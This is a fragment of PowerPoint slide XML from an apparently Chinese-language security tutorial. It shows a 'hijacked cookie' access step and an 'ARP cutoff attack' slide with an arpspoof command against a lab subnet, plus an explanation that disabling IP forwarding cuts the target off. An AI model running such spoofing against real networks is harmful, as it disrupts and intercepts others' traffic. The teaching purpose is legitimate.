            <a:off x="354636" y="954792"/>
            <a:ext cx="12035461" cy="5885231"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="673" name="Shape 673"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="316532" y="215899"/>
            <a:ext cx="6764656"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点击左侧链接，已经成功劫持cookie，实现访问</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="674" name="Shape 674"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513018" y="7271771"/>
            <a:ext cx="2054648"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>ARP断网攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="675" name="Shape 675"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1072266" y="8495779"/>
            <a:ext cx="7403934"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500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>arpspoof   -i   eth0   172.16.211.1   172.16.211.128</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="676" name="Shape 676"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665321" y="7948532"/>
            <a:ext cx="1203546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200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>关闭本地IP转发，当来自网关的流量到达本机时，目标机器无法获得来自网关的数据，从而“断网”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>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